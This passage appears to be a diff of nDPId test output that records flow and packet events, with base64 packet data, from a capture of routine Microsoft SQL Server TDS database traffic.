-00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1259762400716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1259762400716,"pkt":"AAwp2\/PSAB3lNE84CABFAADmQ4pAAH8GM6kKb29vCgAAARWzBZmoeiv6Zz8h41AY96R0ygAAAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="} 
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1259762400730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1259762400730,"pkt":"AAAMB6wCAAwp2\/PSCABFAABKJJBAAIAGUj8KAAABCm9vbwWZFbNnPyHjqHosuFAY+DP7pwAABAEAIgAzAQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="} -00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1259762400747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":307,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":307,"pkt_l4_len":273,"thread_ts_msec":1259762400747,"pkt":"AAwp2\/PSAB3lNE84CABFAAElQ4tAAH8GM2kKb29vCgAAARWzBZmoeiy4Zz8iBVAY94KXAwAAAwEA\/QAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANP\/\/AADnQB8JBNAANLgAYwByAGUAYQB0AGUAIAB0AGEAYgBsAGUAIABuAGUAdwBzAHkAYgAgACgAYwBvAGwAdQBtAG4AMQAgAGMAaABhAHIAKAAzADAAKQAgAG4AbwB0ACAAbgB1AGwAbAAsACAAYwBvAGwAdQBtAG4AMgAgAGMAaABhAHIAKAAzADAAKQAgAG4AdQBsAGwALABjAG8AbAB1AG0AbgAzACAAYwBoAGEAcgAoADMAMAApACAAbgB1AGwAbAApAA=="} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1240877917888,"flow_last_seen":1240877918029,"flow_idle_time":7440000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":874,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1259762407935,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1259762474884,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3m9AAIAGks0Kb29vCgAAARoKBZn0doxX83WfcFAQ\/vLIiAAAAwQfQAAAAQAWAAAAEgAAAAIAJgAAAJ0AAAABAAAADQBwAF8AUwBhAHYAZQBFAHgAYQBtAHAAbABlAAAACkAATABvAG4AZwBQAGEAcgBhAG0AAOf\/\/wkE0AA0BCAAAAAAAAAEIAAAUwB0AHUAZABlAG4AYwBrAGkAZQAgAEsAbwBCAW8AIABQAHIAegBlAHcAbwBkAG4AaQBrAPMAdwAgAFQAdQByAHkAcwB0AHkAYwB6AG4AeQBjAGgAIAB3ACAARwBkAGEARAFzAGsAdQAKAHoAYQBwAHIAYQBzAHoAYQAgAG4AYQA6AAoAWABYAFgAVgAgAE4AbwBjAG4AZQAgAE0AYQByAHMAegBlACAAbgBhACAATwByAGkAZQBuAHQAYQBjAGoAGQEgACIARABhAHIAfAFsAHUAYgAiAAoAMAA0AC8AMAA1ACAAZwByAHUAZABuAGkAYQAgADIAMAAxADAACgAKAFcAcwB0ABkBcAAKAAoATgBvAGMAbgBlACAATQBhAHIAcwB6AGUAIABuAGEAIABPAHIAaQBlAG4AdABhAGMAagAZASAAIgBEAGEAcgB8AWwAdQBiACIAIABzAAUBIAB0AHUAcgB5AHMAdAB5AGMAegBuAAUBIABpAG0AcAByAGUAegAFASAAbgBhACAAbwByAGkAZQBuAHQAYQBjAGoAGQEgACgASQBuAE8AKQAsACAAdwAgAGsAdADzAHIAZQBqACAAdQBjAHoAZQBzAHQAbgBpAGMAeQAgAG0AYQBqAAUBIAB6AGEAIAB6AGEAZABhAG4AaQBlACAAcABvAHQAdwBpAGUAcgBkAHoAaQAHASAAdwAgAG8AawByAGUAWwFsAG8AbgB5AG0AIABsAGkAbQBpAGMAaQBlACAAYwB6AGEAcwB1ACAAcwB3AG8AagAFASAAbwBiAGUAYwBuAG8AWwEHASAAcAByAHoAeQAgAHUAcwB0AGEAdwBpAG8AbgB5AGMAaAAgAHcAIAB0AGUAcgBlAG4AaQBlACAAcAB1AG4AawB0AGEAYwBoACAAawBvAG4AdAByAG8AbABuAHkAYwBoAC4AIABOAGEAIABkAGEAbgBlAGoAIAB0AHIAYQBzAGkAZQAgAHoAdwB5AGMAaQAZAXwBYQAgAHoAZQBzAHAA8wBCASwAIABrAHQA8wByAHkAIAB6AGEAIABwAG8AawBvAG4AYQBuAGkAZQAgAHQAcgBhAHMAeQAgAHUAegB5AHMAawBhAEIBIABuAGEAagBtAG4AaQBlAGoAcwB6AAUBIABsAGkAYwB6AGIAGQEgAHAAdQBuAGsAdADzAHcAIABrAGEAcgBuAHkAYwBoAC4AIABVAGMAegBlAHMAdABuAGkAawDzAHcAIABvAGIAbwB3AGkABQF6AHUAagBlACAAegBtAG8AZAB5AGYAaQBrAG8AdwBhAG4AeQAgAHIAZQBnAHUAbABhAG0AaQBuACAAdAB1AHIAeQBzAHQAeQBjAHoAbgB5AGMAaAAgAGkAbQBwAHIAZQB6A
CAAbgBhACAAbwByAGkAZQBuAHQAYQBjAGoAGQEgAFAAVABUAEsALgAKAAoAVAB5AG0AIAByAGEAegBlAG0AIAB0AG8AdwBhAHIAegB5AHMAegB5AAcBIABuAGEAbQAgAGIAGQFkAHoAaQBlACAAYQBnAGUAbgB0ACAAMAAwADcALAAgAEoAYQBtAGUAcwAgAEIAbwBuAGQALgAgAFoAZABvAGIABQFkAHoBYwBpAGUAIABsAGkAYwBlAG4AYwBqABkBIABuAGEAIAB6AGEAYgBCAQUBZAB6AGUAbgBpAGUAIQAKAAoASgBhAGsAIABjAG8AIAByAG8AawB1ACAAbwBkAGIAGQFkAHoAaQBlACAAcwBpABkBIABrAG8AbgBrAHUAcgBzACAAbgBhACAAbgBhAGoAbAA="} -02410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nBAAIAGkswKb29vCgAAARoKBZn0dpIL83WfcFAQ\/vKFNgAAZQBwAHMAegAFASAAbgBhAHoAdwAZASAAegBlAHMAcABvAEIBdQAgAG4AYQB3AGkABQF6AHUAagAFAWMABQEgAGQAbwAgAHQAZQBtAGEAdAB1ACAAcAByAHoAZQB3AG8AZABuAGkAZQBnAG8AIABpAG0AcAByAGUAegB5AC4ACgAKADEALgAgAE8AcgBnAGEAbgBpAHoAYQB0AG8AcgAgAGkAbQBwAHIAZQB6AHkACgAKAFMAdAB1AGQAZQBuAGMAawBpAGUAIABLAG8AQgFvACAAUAByAHoAZQB3AG8AZABuAGkAawDzAHcAIABUAHUAcgB5AHMAdAB5AGMAegBuAHkAYwBoACAAdwAgAEcAZABhAEQBcwBrAHUALAAgAGQAegBpAGEAQgFhAGoABQFjAGUAIABwAHIAegB5ACAATwBkAGQAegBpAGEAbABlACAAUwB0AHUAZABlAG4AYwBrAGkAbQAgAFAAVABUAEsALgAKAEEAZAByAGUAcwA6ACAAdQBsAC4AIABTAGkAZQBkAGwAaQBjAGsAYQAgADQALAAgADgAMAAtADIAMgAyACAARwBkAGEARAFzAGsALAAgAGUALQBtAGEAaQBsADoAIABzAGsAcAB0AEAAcwBrAHAAdAAuAGcAZABhAG4AcwBrAC4AcABsACwAIAB3AHcAdwAuAHMAawBwAHQALgBnAGQAYQBuAHMAawAuAHAAbAAKAAoAMgAuACAAVwBzAHAA8wBCAXAAcgBhAGMAYQAgAGkAIABzAHAAbwBuAHMAbwByAHoAeQAKAAoAIAAgACAAIAAqACAAZgBpAHIAbQBhACAAYwBhAHQAZQByAGkAbgBnAG8AdwBhACAAWQBlAGwAbABvAHcAIABDAGEAdABlAHIAaQBuAGcACgAgACAAIAAgACoAIABTAHQAbwB3AGEAcgB6AHkAcwB6AGUAbgBpAGUAIABOAGEAIABSAHoAZQBjAHoAIABSAGEAdABvAHcAbgBpAGMAdAB3AGEAIABBAGQAaQB1AHQAYQByAGUACgAgACAAIAAgACoAIABwAHIAbwBkAHUAYwBlAG4AdAAgAFsBcABpAHcAbwByAPMAdwAgAGkAIABvA
GQAegBpAGUAfAF5ACAAcAB1AGMAaABvAHcAZQBqACAAUgBvAGIAZQByAHQAJwBzACAATwB1AHQAZABvAG8AcgAgAEUAcQB1AGkAcABtAGUAbgB0AAoAIAAgACAAIAAqACAAcwBrAGwAZQBwACAAegAgAG8AZAB6AGkAZQB8AQUBIABpACAAcwBwAHIAegAZAXQAZQBtACAAdAB1AHIAeQBzAHQAeQBjAHoAbgB5AG0AIABUAHIAZQBrAAoAIAAgACAAIAAqACAAVwB5AGQAYQB3AG4AaQBjAHQAdwBvACAARQBrAG8ALQBLAGEAcABpAG8AIABQAGkAbwB0AHIAIABLAGEAcABjAHoAeQBEAXMAawBpAAoAIAAgACAAIAAqACAAUwBrAGwAZQBwACAAZwDzAHIAcwBrAGkAIABFAC0AcABhAG0AaQByAC4AcABsAAoAIAAgACAAIAAqACAAVABlAGEAdAByACAATQBpAGUAagBzAGsAaQAgAHcAIABHAGQAeQBuAGkAIABpAG0ALgAgAFcALgAgAEcAbwBtAGIAcgBvAHcAaQBjAHoAYQAKACAAIAAgACAAKgAgAFcAcwBwAGkAbgBhAGwAbgBpAGEAIABBAGwAZgBhACAAQwBlAG4AdAByAHUAbQAKACAAIAAgACAAKgAgAFAAaQBlAGsAYQByAG4AaQBhAC0AQwB1AGsAaQBlAHIAbgBpAGEAIABLAHIAYQBzAGsAbwB3AHMAawBpAAoACgAKADMALgAgAE4AbwB3AG8AWwFjAGkAIAB3ACAAdABlAGoAIABlAGQAeQBjAGoAaQAKAAoAIAA="} -02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nFAAIAGkssKb29vCgAAARoKBZn0dpe\/83WfcFAQ\/vIuZwAAIAAgACAAKgAgAEwAaQBjAHoAYgBhACAAdAByAGEAcwAgAFQAcgB1AGQAbgB5AGMAaAAgAHoAbwBzAHQAYQBCAWEAIABvAGcAcgBhAG4AaQBjAHoAbwBuAGEAIABkAG8AIABkAHcA8wBjAGgALAAgAGEAIABuAGEAIAB0AHIAYQBzAGkAZQAgAE0AYQBCAW8AIABUAHIAdQBkAG4AZQBqACAAegB3AGkAGQFrAHMAegB5AGwAaQBbAW0AeQAgAGwAaQBtAGkAdAAgAG8AcwDzAGIAIAB3ACAAegBlAHMAcABvAEIBYQBjAGgAIABkAG8AIABwAGkAGQFjAGkAdQAuACAASgBlAGQAbgBvAGMAegBlAFsBbgBpAGUAIABpAG4AZgBvAHIAbQB1AGoAZQBtAHkALAAgAHwBZQAgAHoAdwB5AGMAaQAZAXMAawBpAGUAIABkAHIAdQB8AXkAbgB5ACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAG8AdAByAHoAeQBtAGEAagAFASAAbgBhAGcAcgBvAGQAeQAgAGoAYQBrAG8AIABvAHMAdABhAHQAbgBpAGUALAAgAHAAbwAgAHoAdwB5AGMAaQAZAXoAYwBhAGMAaAAgAHcAcwB6AHkAcwB0AGsAaQBjAGgAIABwAG8AegBvAHMAdABhAEIBeQBjAGgAIAB0
AHIAYQBzAC4AIABaAGEAYwBoABkBYwBhAG0AeQAgAGQAbwAgAHUAYwB6AGUAcwB0AG4AaQBjAHQAdwBhACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAHIAbwBkAHoAaQBuAHkAIAB6ACAAZAB6AGkAZQAHAW0AaQAuAAoAIAAgACAAIAAqACAAUABvAGQAbgBpAGUAcwBpAG8AbgBhACAAegBvAHMAdABhAEIBYQAgAHcAeQBzAG8AawBvAFsBBwEgAHcAcABpAHMAbwB3AGUAZwBvACAAZABsAGEAIAB6AGUAcwBwAG8AQgHzAHcAIAB6AGEAcABpAHMAdQBqAAUBYwB5AGMAaAAgAHMAaQAZASAAcAByAHoAZQB6ACAASQBuAHQAZQByAG4AZQB0ACAAaQAgAHcAeQBuAG8AcwBpACAAbwBiAGUAYwBuAGkAZQAgADIANQAgAFAATABOAC4ACgAgACAAIAAgACoAIABQAG8AZABuAGkAZQBzAGkAbwBuAGEAIAB6AG8AcwB0AGEAQgFhACAAdABhAGsAfAFlACAAdwB5AHMAbwBrAG8AWwEHASAAdwBwAGkAcwBvAHcAZQBnAG8AIABkAGwAYQAgAHoAZQBzAHAAbwBCAfMAdwAgAHUAaQBzAHoAYwB6AGEAagAFAWMAeQBjAGgAIABvAHAAQgFhAHQAGQEgAHcAIABiAGEAegBpAGUAIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABsAHUAYgAgAHoAYQBwAGkAcwB1AGoABQFjAHkAYwBoACAAcwBpABkBIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABpACAAdwB5AG4AbwBzAGkAIABvAGIAZQBjAG4AaQBlACAANAAwACAAUABMAE4ALgAKACAAIAAgACAAKgAgAE0AaQBlAGoAcwBjAGUAIABzAHQAYQByAHQAdQAgAG8AZwBCAW8AcwB6AG8AbgBlACAAegBvAHMAdABhAG4AaQBlACAAdwAgAGQAbgBpAHUAIABpAG0AcAByAGUAegB5ACAAbwAgAGcAbwBkAHoAaQBuAGkAZQAgADAAOQA6ADAAMAAuAAoAIAAgACAAIAAqACAASQBzAHQAbgBpAGUAagBlACAAbQBvAHwBbABpAHcAbwBbAQcBIABzAGsAbwByAHoAeQBzAHQAYQBuAGkAYQAgAHoAIAB0AHIAYQBuAHMAcAA="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00965{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":425,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":425,"pkt_l4_len":391,"thread_ts_msec":1259762477536,"pkt":"ABI\/\/61OABI\/\/6gdCABFAAGb5atAAIAGj9IKb29vCgAAAR5hBZmoWkXE76JT4VAY\/ohFLgAAAwkBcwAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAEABwAF8AUwBlAHQAQgBvAGcAdQBzAFMAYQBtAHAAbABlAAAAD0AAQgBvAGcAdQBzAEQAZQB0AGEAaQBsAHMASQBEAAAmCAhFIwEAAAAAAA5AAEIAbwBnAHUAcwBTAHQAYQB0AHUAcwBJAEQAACYICAUAAAAAAAAAC0AAUgBlAHMAdQBsAHQAQwBvAGQAZQAA5wIACQTQADT\/\/wpAAFIAZQBzAHUAbAB0AE0AcwBnAADnAgAJBNAANP\/\/CkAARQByAHIAbwByAEMAbwBkAGUAAOcCAAkE0AA0\/\/8JQABFAHIAcgBvAHIATQBzAGcAAOcCAAkE0AA0\/\/8YQABFAHgAYQBtAHAAbABlAEIAbwBnAHUAcwBHAGUAbgBlAHIAYQB0AGUAZABJAEQAAOcCAAkE0AA0\/\/8MQABFAHgAYQBtAHAAbABlAFQAeQBwAGUAACYEBAEAAAA="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1259762482456,"pkt":"ABI\/\/61OABI\/\/6gdCABFAACA6VZAAIAGjUIKb29vCgAAASK4BZmoWq7z77DJrlAY\/kP\/5gAAAwkAWAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAGwBwAF8ARwBlAHQATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAFIAbwB3AEMAbwB1AG4AdAAAAA=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7560000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1259762400004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAABUAAdAAEAGtr4Kb29vCgAAAQiuBZn\/ymPG\/zlOU1AYEAArKgAAAQEALAAAAQBDAE8ATQBNAEkAVAAgAFQAUgBBAE4AUwBBAEMAVABJAE8ATgA="} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7560000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1259762400004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAAA5AAhAAEAGttgKAAABCm9vbwWZCK7\/OU5T\/8pj8lAYEABYKQAABAEAEQE6AQD9AADVAAAAAAA="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7560000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1259762400022,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1259762400022,"pkt":"ABj+dhvGERERERESCABFAADhAAlAAEAGti8Kb29vCgAAAQ0FBZmoWe0S76GBTlAYEAB74gAAAwkAuQAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAADgBwAF8ARwBlAHQAQgBvAGcAdQBzAEQAYQB0AGEAAAALQABTAGUAYQByAGMAaABUAHkAcABlAAAmAQEBFUAATQBhAHgAVwBhAGkAdABUAGkAbQBlAEkAbgBTAGUAYwBvAG4AZABzAAAmBAQAAAAAE0AAUAByAG8AYwBlAHMAcwBOAGUAZwBhAHQAaQB2AGUAQQBjAGsAACYBAQA="} 
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7560000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7560000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1259762400033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1136,"pkt_l4_len":1102,"thread_ts_msec":1259762400033,"pkt":"ABj+dhvGERERERESCABFAARiAAxAAEAGsqsKb29vCgAAARFcBZmNJzZmudpdulAYEAAslQAAAwkEOgAAAQANAHMAcABfAGUAeABlAGMAdQB0AGUAcwBxAGwAAgAAAOemAwkE0AA0pgNTAEUATABFAEMAVAAgAFQATwBQACAAOAA4ACAAWwBkAGIAbwBdAC4AWwBNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAXQAuAFsASQBEAF0ALAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEUAbgB0AGkAdAB5AEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBIAGkAcwB0AG8AcgB5AEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBUAHkAcABlAEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQ